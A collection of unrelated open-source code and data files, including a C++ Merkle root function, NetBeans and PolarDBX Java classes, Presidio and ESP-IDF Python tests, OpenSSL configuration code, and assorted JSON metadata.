    vector<unsigned char> calculateMerkleTreeRoot(vector<vector<unsigned char>> datas){
        vector<vector<unsigned char>> tree(datas);
        int size = tree.size();
        int levelOffset = 0;
        for (int levelSize = size; levelSize > 1; levelSize = (levelSize + 1) / 2) {
            for (int left = 0; left < levelSize; left += 2) {
                int right = MathUtil::min(left + 1, levelSize - 1);
                vector<unsigned char> leftBytes = tree[levelOffset + left];
                vector<unsigned char> rightBytes = tree[levelOffset + right];
                tree.push_back(Sha256Util::doubleDigest(ByteUtil::concatenate(leftBytes, rightBytes)));
            }
            levelOffset += levelSize;
        }
        return tree[tree.size()-1];
    }
}
438
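A small illustrative caller of calculateMerkleTreeRoot from the file above, assuming MerkleTreeUtil.h declares the function with the signature shown in its definition. The leaf byte vectors are placeholders; in the real code they would be SHA-256 digests.

#include <vector>

#include "MerkleTreeUtil.h"   // assumed to declare calculateMerkleTreeRoot as defined above

int main() {
  // Placeholder leaves standing in for transaction hashes.
  std::vector<std::vector<unsigned char>> leaves = {
      {0x01, 0x02, 0x03},
      {0x04, 0x05, 0x06},
  };
  std::vector<unsigned char> root = MerkleTreeUtil::calculateMerkleTreeRoot(leaves);
  return root.empty() ? 1 : 0;
}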
1,056
<filename>apisupport/apisupport.ant/src/org/netbeans/modules/apisupport/project/queries/JavadocForBinaryImpl.java<gh_stars>1000+ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.apisupport.project.queries; import java.io.File; import java.net.MalformedURLException; import java.net.URI; import java.net.URL; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import javax.swing.event.ChangeListener; import org.netbeans.api.java.queries.JavadocForBinaryQuery; import org.netbeans.api.java.queries.JavadocForBinaryQuery.Result; import org.netbeans.modules.apisupport.project.NbModuleProject; import org.netbeans.modules.apisupport.project.NbModuleType; import org.netbeans.modules.apisupport.project.universe.NbPlatform; import org.netbeans.spi.java.queries.JavadocForBinaryQueryImplementation; import org.openide.filesystems.FileUtil; import org.openide.filesystems.URLMapper; import org.openide.util.Utilities; /** * Defines Javadoc locations for built modules with built javadoc. * @author <NAME> */ public final class JavadocForBinaryImpl implements JavadocForBinaryQueryImplementation { private static final String NB_ALL_INFIX = "nbbuild" + File.separatorChar + "build" + File.separatorChar + "javadoc" + File.separatorChar; // NOI18N private static final String EXT_INFIX = "build" + File.separatorChar + "javadoc" + File.separatorChar; // NOI18N /** Configurable for the unit test, since it is too cumbersome to create fake Javadoc in all the right places. 
*/ static boolean ignoreNonexistentRoots = true; private final NbModuleProject project; public JavadocForBinaryImpl(NbModuleProject project) { this.project = project; } public JavadocForBinaryQuery.Result findJavadoc(URL binaryRoot) { if (!binaryRoot.equals(FileUtil.urlForArchiveOrDir(project.getModuleJarLocation()))) { return findForCPExt(binaryRoot); } String cnb = project.getCodeNameBase(); if (cnb == null) { // #115521 return null; } String cnbdashes = cnb.replace('.', '-'); try { final List<URL> candidates = new ArrayList<URL>(); NbPlatform platform = project.getPlatform(false); if (platform == null) { return null; } for (URL root : platform.getJavadocRoots()) { candidates.add(new URL(root, cnbdashes + "/")); // NOI18N } File dir; NbModuleType type = project.getModuleType(); if (type == NbModuleType.NETBEANS_ORG) { dir = project.getNbrootFile(NB_ALL_INFIX + cnbdashes); } else { // XXX should evaluate and use ${build.dir}/javadoc instead dir = new File(project.getProjectDirectoryFile(), EXT_INFIX + cnbdashes); } if (dir != null) { // #118491 candidates.add(FileUtil.urlForArchiveOrDir(dir)); } if (ignoreNonexistentRoots) { Iterator<URL> it = candidates.iterator(); while (it.hasNext()) { URL u = it.next(); if (URLMapper.findFileObject(u) == null) { it.remove(); } } } return new R(candidates.toArray(new URL[candidates.size()])); } catch (MalformedURLException e) { throw new AssertionError(e); } } /** * Find Javadoc roots for classpath extensions ("wrapped" JARs) of the project * added by naming convention <tt>&lt;jar name&gt;-javadoc(.zip)</tt> * See issue #66275 * @param binaryRoot * @return */ private Result findForCPExt(URL binaryRoot) { URL jar = FileUtil.getArchiveFile(binaryRoot); if (jar == null) return null; // not a class-path-extension File binaryRootF = Utilities.toFile(URI.create(jar.toExternalForm())); // XXX this will only work for modules following regular naming conventions: String n = binaryRootF.getName(); if (!n.endsWith(".jar")) { // NOI18N // ignore return null; } // convention-over-cfg per mkleint's suggestion: <jarname>-javadoc(.zip) folder or ZIP File jFolder = new File(binaryRootF.getParentFile(), n.substring(0, n.length() - ".jar".length()) + "-javadoc"); if (jFolder.isDirectory()) { return new R(new URL[]{FileUtil.urlForArchiveOrDir(jFolder)}); } else { File jZip = new File(jFolder.getAbsolutePath() + ".zip"); if (jZip.isFile()) { return new R(new URL[]{FileUtil.urlForArchiveOrDir(jZip)}); } } return null; } private static final class R implements JavadocForBinaryQuery.Result { private final URL[] roots; public R(URL[] roots) { this.roots = roots; } public URL[] getRoots() { return roots; } public void addChangeListener(ChangeListener l) {} public void removeChangeListener(ChangeListener l) {} } }
2,495
480
<filename>examples/protocols/cbor/example_test.py from __future__ import unicode_literals import re import textwrap import ttfw_idf @ttfw_idf.idf_example_test(env_tag='Example_WIFI') def test_examples_cbor(env, extra_data): dut = env.get_dut('cbor', 'examples/protocols/cbor') dut.start_app() dut.expect(re.compile(r'example: encoded buffer size \d+')) dut.expect('example: convert CBOR to JSON') parsed_info = dut.expect(re.compile(r'\[\{"chip":"(\w+)","unicore":(\w+),"ip":\[(\d+),(\d+),(\d+),(\d+)\]\},' r'3.1400001049041748' r',"simple\(99\)","2019-07-10 09:00:00\+0000","undefined"\]')) dut.expect('example: decode CBOR manually') dut.expect(re.compile(textwrap.dedent(r''' Array\[\s+ Map{{\s+ chip\s+ {}\s+ unicore\s+ {}\s+ ip\s+ Array\[\s+ {}\s+ {}\s+ {}\s+ {}\s+ \]\s+ }}\s+ 3.14\s+ simple\(99\)\s+ 2019-07-10 09:00:00\+0000\s+ undefined\s+ \]'''.format(*parsed_info)).replace('{', r'\{').replace('}', r'\}'))) if __name__ == '__main__': test_examples_cbor()
1,427
348
{"nom":"Commenailles","circ":"1ère circonscription","dpt":"Jura","inscrits":618,"abs":292,"votants":326,"blancs":18,"nuls":8,"exp":300,"res":[{"nuance":"REM","nom":"<NAME>","voix":223},{"nuance":"LR","nom":"<NAME>","voix":77}]}
87
480
<gh_stars>100-1000 /* * Copyright [2013-2021], Alibaba Group Holding Limited * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.alibaba.polardbx.executor.handler; import com.alibaba.polardbx.common.jdbc.ParameterContext; import com.alibaba.polardbx.executor.common.ExecutorContext; import com.alibaba.polardbx.executor.cursor.Cursor; import com.alibaba.polardbx.executor.cursor.impl.MultiCursorAdapter; import com.alibaba.polardbx.executor.spi.IRepository; import com.alibaba.polardbx.executor.utils.ExecUtils; import com.alibaba.polardbx.optimizer.context.ExecutionContext; import com.alibaba.polardbx.optimizer.core.rel.dal.BaseDalOperation; import com.alibaba.polardbx.optimizer.utils.QueryConcurrencyPolicy; import org.apache.calcite.rel.RelNode; import org.apache.commons.lang.StringUtils; import java.util.ArrayList; import java.util.List; import java.util.Map; /** * @author chenmo.cm */ public class BaseDalHandler extends HandlerCommon { public BaseDalHandler(IRepository repo) { super(repo); } @Override public Cursor handle(RelNode logicalPlan, ExecutionContext executionContext) { final BaseDalOperation dal = (BaseDalOperation) logicalPlan; if (dal.single()) { return repo.getCursorFactory().repoCursor(executionContext, logicalPlan); } return buildMultiCursor(executionContext, dal); } public Cursor buildMultiCursor(ExecutionContext executionContext, BaseDalOperation dal) { QueryConcurrencyPolicy queryConcurrencyPolicy = ExecUtils.getQueryConcurrencyPolicy(executionContext); List<Cursor> inputCursors = new ArrayList<>(); Map<Integer, ParameterContext> params = executionContext.getParams() == null ? null : executionContext.getParams() .getCurrentParameter(); List<RelNode> inputs = dal.getInput(params); Cursor baseDalCursor; String schemaName = dal.getSchemaName(); if (StringUtils.isEmpty(schemaName)) { schemaName = executionContext.getSchemaName(); } // NOT GROUP LEVEL ANYMORE, COZ UNION OPTIMIZATION WAS REMOVED, // NOW GROUP CONCURRENT BLOCK IS SAME AS FULL CONCURRENT if (QueryConcurrencyPolicy.GROUP_CONCURRENT_BLOCK.equals(queryConcurrencyPolicy)) { executeGroupConcurrent(executionContext, inputs, inputCursors, schemaName); } else { for (RelNode relNode : inputs) { inputCursors.add(ExecutorContext.getContext(schemaName) .getTopologyExecutor() .execByExecPlanNode(relNode, executionContext)); } } baseDalCursor = MultiCursorAdapter.wrap(inputCursors); return baseDalCursor; } }
1,209
394
#include "jumptoframecommand.h" #include "gitlivkcmdevt.h" JumpToFrameCommand::JumpToFrameCommand(QObject *parent) : GitlAbstractCommand(parent) { } bool JumpToFrameCommand::execute( GitlCommandParameter& rcInputArg, GitlCommandParameter& rcOutputArg ) { QVariant vValue = rcInputArg.getParameter("poc"); int iPoc = vValue.toInt(); /// ModelLocator* pModel = ModelLocator::getInstance(); ComSequence *pcCurSeq = pModel->getSequenceManager().getCurrentSequence(); if(pcCurSeq == NULL) return false; if( iPoc > pcCurSeq->getTotalFrames()-1 || iPoc < 0 ) { return false; } QPixmap* pcFramePixmap = pModel->getFrameBuffer().getFrame(iPoc); ///< Read Frame Buffer pcFramePixmap = pModel->getDrawEngine().drawFrame(pcCurSeq, iPoc, pcFramePixmap); ///< Draw Frame Buffer /// rcOutputArg.setParameter("picture", QVariant::fromValue((void*)(pcFramePixmap))); rcOutputArg.setParameter("current_frame_poc", iPoc); rcOutputArg.setParameter("total_frame_num", pcCurSeq->getTotalFrames()); return true; }
419
5,169
<filename>Specs/c/3/7/HYSDK/0.0.11/HYSDK.podspec.json { "name": "HYSDK", "version": "0.0.11", "summary": "幻意科技的ios客户端SDK", "description": "上海幻意科技的ios客户端SDK", "homepage": "https://gitee.com/morliaIT/HYSDL_iOS.git", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "<EMAIL>": "<EMAIL>" }, "platforms": { "ios": "10.0" }, "source": { "git": "https://gitee.com/morliaIT/HYSDL_iOS.git", "tag": "0.0.11" }, "resources": "Bundles/*.bundle", "swift_versions": "5.0", "frameworks": "SafariServices", "vendored_frameworks": [ "Frameworks/hysdk.framework", "Frameworks/NaverCafeSDK.framework", "Frameworks/FLAnimatedImage-1.0.12/FLAnimatedImage.framework", "Frameworks/NaverLogin-4.1.1/NaverLogin.framework", "Frameworks/SDWebImage-3.8.2/SDWebImage.framework" ], "requires_arc": true, "dependencies": { "FacebookCore": [ "~> 0.9.0" ], "FacebookLogin": [ "~> 0.9.0" ], "FacebookShare": [ "~> 0.9.0" ], "Firebase/Analytics": [ "~> 6.28.0" ] }, "swift_version": "5.0" }
571
4,538
<reponame>alibaba/AliOS-Things /* * Copyright (C) 2020-2021 Alibaba Group Holding Limited */ #ifndef AOS_TTY_H #define AOS_TTY_H #include <termios.h> #include <aos/device.h> typedef aos_dev_ref_t aos_tty_ref_t; #ifdef __cplusplus extern "C" { #endif /** * @brief Get a TTY device. * @param[out] ref TTY ref to operate * @param[in] id TTY device ID * @return 0: on success; < 0: on failure */ aos_status_t aos_tty_get(aos_tty_ref_t *ref, uint32_t id); /** * @brief Release a TTY device. * @param[in] ref TTY ref to operate * @return None */ void aos_tty_put(aos_tty_ref_t *ref); /** * @brief Get the parameters associated with a TTY device. * @param[in] ref TTY ref to operate * @param[out] termios POSIX-compliant termios struct * @return 0: on success; < 0: on failure */ aos_status_t aos_tty_get_attr(aos_tty_ref_t *ref, struct termios *termios); /** * @brief Set the parameters associated with a TTY device. * @param[in] ref TTY ref to operate * @param[in] optional_actions specifie when the changes take effect * @param[in] termios POSIX-compliant termios struct * @return 0: on success; < 0: on failure */ aos_status_t aos_tty_set_attr(aos_tty_ref_t *ref, int optional_actions, const struct termios *termios); /** * @brief Read data from a TTY device. * @param[in] ref TTY ref to operate * @param[out] buf data buffer * @param[in] count attempt to read up to count bytes * @param[in] timeout timeout in milliseconds * @return > 0: the number of bytes read; < 0: on failure */ ssize_t aos_tty_read(aos_tty_ref_t *ref, void *buf, size_t count, uint32_t timeout); /** * @brief Write data to a TTY device. * @param[in] ref TTY ref to operate * @param[in] buf data buffer * @param[in] count attempt to write up to count bytes * @param[in] timeout timeout in milliseconds * @return > 0: the number of bytes written; < 0: on failure */ ssize_t aos_tty_write(aos_tty_ref_t *ref, const void *buf, size_t count, uint32_t timeout); #ifdef __cplusplus } #endif #endif /* AOS_TTY_H */
898
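A hedged usage sketch of the TTY API declared in aos_tty.h above: acquire device 0, adjust the baud rate through the POSIX termios struct, write and read with a timeout, then release the reference. The include path, device ID, baud rate, and error handling are assumptions; only the functions documented in the header plus standard termios helpers are used.

#include <cstring>
#include <sys/types.h>
#include <termios.h>

#include <aos/tty.h>   // assumed install path of the header above

int tty_demo(void) {
  aos_tty_ref_t tty;
  if (aos_tty_get(&tty, 0) != 0) {      // device ID 0 is an assumption
    return -1;
  }

  struct termios tio;
  if (aos_tty_get_attr(&tty, &tio) == 0) {
    cfsetispeed(&tio, B115200);         // 115200 baud is an arbitrary choice
    cfsetospeed(&tio, B115200);
    (void)aos_tty_set_attr(&tty, TCSANOW, &tio);
  }

  const char msg[] = "hello\r\n";
  (void)aos_tty_write(&tty, msg, std::strlen(msg), /*timeout ms*/ 100);

  char buf[32];
  ssize_t n = aos_tty_read(&tty, buf, sizeof(buf), /*timeout ms*/ 100);
  (void)n;

  aos_tty_put(&tty);
  return 0;
}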
660
/* * Copyright (c) 2019, Intel Corporation * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included * in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */ //! //! \file decode_sub_packet_manager.cpp //! \brief Defines the common interface for decode sub packet manager implementation //! \details The decocode sub packet manager interface is further sub-divided by different packet usages, //! this file is for the base interface which is shared by all decode packets. //! #include "decode_sub_packet_manager.h" #include "decode_utils.h" namespace decode { DecodeSubPacketManager::~DecodeSubPacketManager() { for (auto subPacket : m_subPacketList) { MOS_Delete(subPacket.second); } m_subPacketList.clear(); } MOS_STATUS DecodeSubPacketManager::Register(uint32_t packetId, DecodeSubPacket& subPacket) { auto iter = m_subPacketList.find(packetId); DECODE_CHK_COND(iter != m_subPacketList.end(), "Failed to register sub packet %d", packetId); m_subPacketList.insert(std::make_pair(packetId, &subPacket)); return MOS_STATUS_SUCCESS; } DecodeSubPacket* DecodeSubPacketManager::GetSubPacket(uint32_t packetId) { auto iter = m_subPacketList.find(packetId); if (iter == m_subPacketList.end()) { return nullptr; } return iter->second; } MOS_STATUS DecodeSubPacketManager::Init() { for (auto subPacket : m_subPacketList) { subPacket.second->Init(); } return MOS_STATUS_SUCCESS; } MOS_STATUS DecodeSubPacketManager::Prepare() { for (auto subPacket : m_subPacketList) { subPacket.second->Prepare(); } return MOS_STATUS_SUCCESS; } }
901
4,057
# -*- coding: utf-8 -*-
from django_extensions.management.jobs import MonthlyJob

from unittest import mock

MONTHLY_JOB_MOCK = mock.MagicMock()


class Job(MonthlyJob):
    help = "My sample monthly job."

    def execute(self):
        MONTHLY_JOB_MOCK()
102
675
/* * Copyright 2012-2014 eBay Software Foundation and selendroid committers. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package io.selendroid.server.common.utils; import java.util.Set; import java.util.HashSet; public class SelendroidArguments { public static final String MAIN_ACTIVITY = "main_activity"; public static final String INTENT_URI = "intent_uri"; public static final String INTENT_ACTION = "intent_action"; public static final String SERVICE = "service"; public static final String LOAD_EXTENSIONS = "load_extensions"; public static final String BOOTSTRAP = "bootstrap"; public static final String SERVER_PORT = "server_port"; public static final Set<String> KNOWN_ARGUMENTS = new HashSet<String>(); static { KNOWN_ARGUMENTS.add(MAIN_ACTIVITY); KNOWN_ARGUMENTS.add(INTENT_URI); KNOWN_ARGUMENTS.add(INTENT_ACTION); KNOWN_ARGUMENTS.add(SERVICE); KNOWN_ARGUMENTS.add(LOAD_EXTENSIONS); KNOWN_ARGUMENTS.add(BOOTSTRAP); KNOWN_ARGUMENTS.add(SERVER_PORT); } }
476
1,408
<reponame>kubistika/presidio import pytest from presidio_analyzer import RecognizerResult @pytest.mark.parametrize( # fmt: off "start, end", [ (0, 10), (2, 8), (0, 8), (0, 10), ], # fmt: on ) def test_given_recognizer_results_then_one_contains_another(start, end): first = create_recognizer_result("", 0, 0, 10) second = create_recognizer_result("", 0, start, end) assert first.contains(second) @pytest.mark.parametrize( # fmt: off "start, end", [ (4, 10), (5, 11), (0, 5), (0, 6), ], # fmt: on ) def test_given_recognizer_result_then_they_do_not_contain_one_another(start, end): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert not first.contains(second) def test_given_recognizer_results_with_same_indices_then_indices_are_equal(): first = create_recognizer_result("", 0, 0, 10) second = create_recognizer_result("", 0, 0, 10) assert first.equal_indices(second) @pytest.mark.parametrize( # fmt: off "start, end", [ (4, 10), (5, 11), (0, 5), (0, 6), ], # fmt: on ) def test_given_recognizer_results_with_different_indices_then_indices_are_not_equal( start, end ): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert not first.equal_indices(second) def test_given_identical_recognizer_results_then_they_are_equal(): first = create_recognizer_result("bla", 0.2, 0, 10) second = create_recognizer_result("bla", 0.2, 0, 10) assert first == second @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 4, 10), ("changed", 0.2, 0, 10), ("bla", 0.2, 0, 11), ("bla", 0.3, 0, 10), ], # fmt: on ) def test_given_different_recognizer_result_then_they_are_not_equal( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 0, 10) second = create_recognizer_result(entity_type, score, start, end) assert first != second def test_given_recognizer_result_then_their_hash_is_equal(): first = create_recognizer_result("", 0, 0, 10) second = create_recognizer_result("", 0, 0, 10) assert first.__hash__() == second.__hash__() @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 4, 10), ("changed", 0.2, 0, 10), ("bla", 0.2, 0, 11), ("bla", 0.3, 0, 10), ], # fmt: on ) def test_given_different_recognizer_results_then_hash_is_not_equal( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 0, 10) second = create_recognizer_result(entity_type, score, start, end) assert first.__hash__() != second.__hash__() @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 0, 10), ("changed", 0.2, 2, 10), ("bla", 0.3, 0, 11), ("bla", 0.1, 0, 10), ], # fmt: on ) def test_given_recognizer_results_with_conflicting_indices_then_there_is_a_conflict( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 2, 10) second = create_recognizer_result(entity_type, score, start, end) assert first.has_conflict(second) @pytest.mark.parametrize( # fmt: off "entity_type, score, start, end", [ ("bla", 0.2, 3, 10), ("changed", 0.1, 2, 10), ("bla", 0.3, 0, 9), ], # fmt: on ) def test_given_recognizer_results_with_no_conflicting_indices_then_there_is_no_conflict( entity_type, score, start, end ): first = create_recognizer_result("bla", 0.2, 2, 10) second = create_recognizer_result(entity_type, score, start, end) assert not first.has_conflict(second) def test_given_valid_json_for_creating_recognizer_result_then_creation_is_successful(): data = create_recognizer_result("NUMBER", 0.8, 0, 32) assert 
data.start == 0 assert data.end == 32 assert data.score == 0.8 assert data.entity_type == "NUMBER" @pytest.mark.parametrize( # fmt: off "start, end", [ (4, 10), (4, 9), (0, 2), (5, 9), ], # fmt: on ) def test_given_recognizer_results_then_one_is_greater_then_another(start, end): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert first.__gt__(second) @pytest.mark.parametrize( # fmt: off "start, end", [ (5, 10), (6, 12), (6, 7), ], # fmt: on ) def test_given_recognizer_result_then_one_is_not_greater_then_another(start, end): first = create_recognizer_result("", 0, 5, 10) second = create_recognizer_result("", 0, start, end) assert not first.__gt__(second) def create_recognizer_result(entity_type: str, score: float, start: int, end: int): data = {"entity_type": entity_type, "score": score, "start": start, "end": end} return RecognizerResult.from_json(data)
2,292
2,757
/* * Copyright 1995-2018 The OpenSSL Project Authors. All Rights Reserved. * * Licensed under the OpenSSL license (the "License"). You may not use * this file except in compliance with the License. You can obtain a copy * in the file LICENSE in the source distribution or at * https://www.openssl.org/source/license.html */ /* Part of the code in here was originally in conf.c, which is now removed */ #include "e_os.h" #include "internal/cryptlib.h" #include <stdlib.h> #include <string.h> #include <openssl/conf.h> #include <openssl/conf_api.h> static void value_free_hash(const CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf); static void value_free_stack_doall(CONF_VALUE *a); /* Up until OpenSSL 0.9.5a, this was get_section */ CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section) { CONF_VALUE *v, vv; if ((conf == NULL) || (section == NULL)) return (NULL); vv.name = NULL; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); return (v); } /* Up until OpenSSL 0.9.5a, this was CONF_get_section */ STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf, const char *section) { CONF_VALUE *v; v = _CONF_get_section(conf, section); if (v != NULL) return ((STACK_OF(CONF_VALUE) *)v->value); else return (NULL); } int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value) { CONF_VALUE *v = NULL; STACK_OF(CONF_VALUE) *ts; ts = (STACK_OF(CONF_VALUE) *)section->value; value->section = section->section; if (!sk_CONF_VALUE_push(ts, value)) { return 0; } v = lh_CONF_VALUE_insert(conf->data, value); if (v != NULL) { (void)sk_CONF_VALUE_delete_ptr(ts, v); OPENSSL_free(v->name); OPENSSL_free(v->value); OPENSSL_free(v); } return 1; } char *_CONF_get_string(const CONF *conf, const char *section, const char *name) { CONF_VALUE *v, vv; char *p; if (name == NULL) return (NULL); if (conf != NULL) { if (section != NULL) { vv.name = (char *)name; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); if (strcmp(section, "ENV") == 0) { p = ossl_safe_getenv(name); if (p != NULL) return (p); } } vv.section = "default"; vv.name = (char *)name; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); else return (NULL); } else return ossl_safe_getenv(name); } static unsigned long conf_value_hash(const CONF_VALUE *v) { return (OPENSSL_LH_strhash(v->section) << 2) ^ OPENSSL_LH_strhash(v->name); } static int conf_value_cmp(const CONF_VALUE *a, const CONF_VALUE *b) { int i; if (a->section != b->section) { i = strcmp(a->section, b->section); if (i) return (i); } if ((a->name != NULL) && (b->name != NULL)) { i = strcmp(a->name, b->name); return (i); } else if (a->name == b->name) return (0); else return ((a->name == NULL) ? -1 : 1); } int _CONF_new_data(CONF *conf) { if (conf == NULL) { return 0; } if (conf->data == NULL) { conf->data = lh_CONF_VALUE_new(conf_value_hash, conf_value_cmp); if (conf->data == NULL) return 0; } return 1; } typedef LHASH_OF(CONF_VALUE) LH_CONF_VALUE; IMPLEMENT_LHASH_DOALL_ARG_CONST(CONF_VALUE, LH_CONF_VALUE); void _CONF_free_data(CONF *conf) { if (conf == NULL || conf->data == NULL) return; /* evil thing to make sure the 'OPENSSL_free()' works as expected */ lh_CONF_VALUE_set_down_load(conf->data, 0); lh_CONF_VALUE_doall_LH_CONF_VALUE(conf->data, value_free_hash, conf->data); /* * We now have only 'section' entries in the hash table. 
Due to problems * with */ lh_CONF_VALUE_doall(conf->data, value_free_stack_doall); lh_CONF_VALUE_free(conf->data); } static void value_free_hash(const CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf) { if (a->name != NULL) (void)lh_CONF_VALUE_delete(conf, a); } static void value_free_stack_doall(CONF_VALUE *a) { CONF_VALUE *vv; STACK_OF(CONF_VALUE) *sk; int i; if (a->name != NULL) return; sk = (STACK_OF(CONF_VALUE) *)a->value; for (i = sk_CONF_VALUE_num(sk) - 1; i >= 0; i--) { vv = sk_CONF_VALUE_value(sk, i); OPENSSL_free(vv->value); OPENSSL_free(vv->name); OPENSSL_free(vv); } sk_CONF_VALUE_free(sk); OPENSSL_free(a->section); OPENSSL_free(a); } /* Up until OpenSSL 0.9.5a, this was new_section */ CONF_VALUE *_CONF_new_section(CONF *conf, const char *section) { STACK_OF(CONF_VALUE) *sk = NULL; int i; CONF_VALUE *v = NULL, *vv; if ((sk = sk_CONF_VALUE_new_null()) == NULL) goto err; if ((v = OPENSSL_malloc(sizeof(*v))) == NULL) goto err; i = strlen(section) + 1; if ((v->section = OPENSSL_malloc(i)) == NULL) goto err; memcpy(v->section, section, i); v->name = NULL; v->value = (char *)sk; vv = lh_CONF_VALUE_insert(conf->data, v); OPENSSL_assert(vv == NULL); if (lh_CONF_VALUE_error(conf->data) > 0) goto err; return v; err: sk_CONF_VALUE_free(sk); if (v != NULL) OPENSSL_free(v->section); OPENSSL_free(v); return NULL; }
2,702
27,066
package com.xkcoding.dynamic.datasource.datasource; import com.zaxxer.hikari.HikariDataSource; import lombok.Getter; import java.time.LocalDateTime; /** * <p> * Datasource manager class * </p> * * @author yangkai.shen * @date Created in 2019-09-04 14:27 */ public class DatasourceManager { /** * Default release time (minutes) */ private static final Long DEFAULT_RELEASE = 10L; /** * The data source */ @Getter private HikariDataSource dataSource; /** * Time of last use */ private LocalDateTime lastUseTime; public DatasourceManager(HikariDataSource dataSource) { this.dataSource = dataSource; this.lastUseTime = LocalDateTime.now(); } /** * Whether the datasource has expired; if it has, the datasource is closed * * @return whether expired, {@code true} expired, {@code false} not expired */ public boolean isExpired() { if (LocalDateTime.now().isBefore(this.lastUseTime.plusMinutes(DEFAULT_RELEASE))) { return false; } this.dataSource.close(); return true; } /** * Refresh the last-use time */ public void refreshTime() { this.lastUseTime = LocalDateTime.now(); } }
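// A hedged usage sketch, not part of the original project: it shows how a hypothetical
// registry could use isExpired()/refreshTime() above to evict idle pools. The class and
// method names below (DatasourceRegistry, cleanUp) are illustrative assumptions.
package com.xkcoding.dynamic.datasource.datasource;

import com.zaxxer.hikari.HikariDataSource;
import java.util.Iterator;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

public class DatasourceRegistry {
    private final Map<String, DatasourceManager> managers = new ConcurrentHashMap<>();

    /** Register (or replace) a managed datasource under the given key. */
    public void register(String key, HikariDataSource dataSource) {
        managers.put(key, new DatasourceManager(dataSource));
    }

    /** Fetch a datasource and mark it as recently used. */
    public HikariDataSource get(String key) {
        DatasourceManager manager = managers.get(key);
        if (manager == null) {
            return null;
        }
        manager.refreshTime();
        return manager.getDataSource();
    }

    /** Called periodically (e.g. by a scheduler) to close and drop expired pools. */
    public void cleanUp() {
        Iterator<Map.Entry<String, DatasourceManager>> it = managers.entrySet().iterator();
        while (it.hasNext()) {
            if (it.next().getValue().isExpired()) { // isExpired() also closes the pool
                it.remove();
            }
        }
    }
}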
600
435
{ "copyright_text": null, "description": "", "duration": 6964, "language": "eng", "recorded": "2015-04-24", "related_urls": [ { "label": "Conference schedule", "url": "https://pydata.org/dal2015/schedule/" } ], "speakers": [], "tags": [], "thumbnail_url": "https://i.ytimg.com/vi/nar7u17qkOU/maxresdefault.jpg", "title": "<NAME> and <NAME> - Building Python Data Applications with Blaze and Bokeh", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=nar7u17qkOU" } ] }
243
916
